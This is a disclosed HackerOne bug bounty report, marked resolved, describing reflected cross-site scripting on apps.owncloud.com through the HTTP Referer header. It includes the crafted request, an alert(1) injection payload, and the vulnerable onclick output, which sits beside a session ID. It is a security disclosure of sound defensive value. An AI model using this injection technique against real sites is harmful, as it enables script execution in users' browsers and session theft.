apps.owncloud.com: XSS via referrer

Disclosed: 2015-10-11 07:05:31 By psych0tr1a To owncloud
Unknown
Vulnerability Details
Look at next request: Host: apps.owncloud.com User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: http://www.myevilsite.com/qwe';alert(1)+' in response page referrer pasts into onclick event of a cancel button onclick="location.href='http://www.myevilsite.com/qwe';alert(1)+'?PHPSESSID=icqgmh3h639vn6a75j6idmj935'" />
Actions
View on HackerOne
Report Stats
  • Report ID: 83374
  • State: Closed
  • Substate: resolved
  • Upvotes: 4
Share this report